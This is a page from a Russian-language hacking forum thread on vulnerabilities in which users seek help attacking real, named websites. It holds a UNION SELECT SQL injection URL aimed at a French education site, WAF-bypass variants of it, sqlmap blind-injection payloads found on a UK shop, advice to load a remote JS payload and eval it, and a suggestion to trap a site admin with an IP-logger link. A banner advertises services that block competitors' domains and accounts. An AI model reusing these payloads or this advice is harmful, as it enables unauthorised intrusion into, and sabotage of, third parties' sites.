УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 237 из 296

237

Опции темы

Поиск в этой теме

Опции просмотра

#2361

21.07.2018, 16:38

iGermi

Guest

Сообщений: n/a

Провел на форуме:
804

Репутация: 0

Здраствуйте, форум. Интересует возможность подключения сторонней JS библиотеки используя html тег . Кто подскажет.

Или любой другой способ использовать js на сайте forum.minecraft-galaxy.ru

#2362

21.07.2018, 16:41

iGermi

Guest

Сообщений: n/a

Провел на форуме:
804

Репутация: 0

Цитата:

Сообщение от Octavian

Octavian said:
↑
Есть возможность узнать ip администратора сайта на wordpress?

Подкинуть ему ссылку на почту с айпи логером

#2363

21.07.2018, 23:28

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Привет а как большой js засовывать, когда невозможно за тега а выйти?

Код:

Code:
finiio

#2364

22.07.2018, 00:13

dmax0fw

Guest

Сообщений: n/a

Провел на форуме:
20361

Репутация: 46

Цитата:

Сообщение от Octavian

Octavian said:
↑
Привет а как большой js засовывать, когда невозможно за тега а выйти?

Код:

Code:
finiio

подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом

#2365

22.07.2018, 00:15

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Цитата:

Сообщение от dmax0fw

dmax0fw said:
↑
подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом

можно пример

#2366

22.07.2018, 00:18

dmax0fw

Guest

Сообщений: n/a

Провел на форуме:
20361

Репутация: 46

Цитата:

Сообщение от Octavian

Octavian said:
↑
можно пример

буквально сегодня в соседней теме отвечал человеку с похожим вопросом

/threads/464058/

#2367

24.07.2018, 18:35

Zyaba

Guest

Сообщений: n/a

Провел на форуме:
220

Репутация: 0

Цитата:

Сообщение от Muracha

Muracha said:
↑
Попробуй залить шелл через плохую обработку mine-type используя tor+live http clone
Уязвимости типа "некорректной обработки данных при загрузке файлов пользователей".
Самая изощренная уязвимость но и самая интересная. Да да, это вам не скули крутить

Можно подробнее? гугление ничего толком не дает.

Есть усечение пути (с кучей /./.) - но это не то, как я понимаю.

#2368

25.07.2018, 21:20

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Отправить сообщение для DezMond™ с помощью ICQ

Помогите ваф обойти

Код:

Code:
http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

#2369

26.07.2018, 09:39

DezMond™

Участник форума

Регистрация: 10.01.2008

Сообщений: 199

Провел на форуме:
961428

Репутация: 662

Цитата:

Сообщение от BabaDook

BabaDook said:
↑

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]reseau[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]canope[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]fr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]climatscolaire[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ressources[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]resultat[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]de[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]recherche[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]html[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tx_cndpclimatsco_pi1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5Baxes[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5D[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tx_cndpclimatsco_pi1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5Bthemes[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5D[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]tx_cndpclimatsco_pi1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5Blocalisations[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]5D[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]a_32[/COLOR][COLOR="#007700"]+and+[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union distinct select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]31[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]32[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]33[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]34[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]

From фильтруется, помогите обойти)

#2370

26.07.2018, 17:46

grelly

Guest

Сообщений: n/a

Провел на форуме:
305

Репутация: 0

Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url http://shoebrand.co.uk/index.php?rou...th=64&limit=32 с использованием тампера between возвращает ошибку:

[WARNING] HTTP error codes detected during run:

403 (Forbidden) - 1 times.

Найденные уязвимости:

Parameter: path (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: route=product/category&path=64 AND 9469=9469&limit=32

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: route=product/category&path=64 AND SLEEP(10)&limit=32

Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?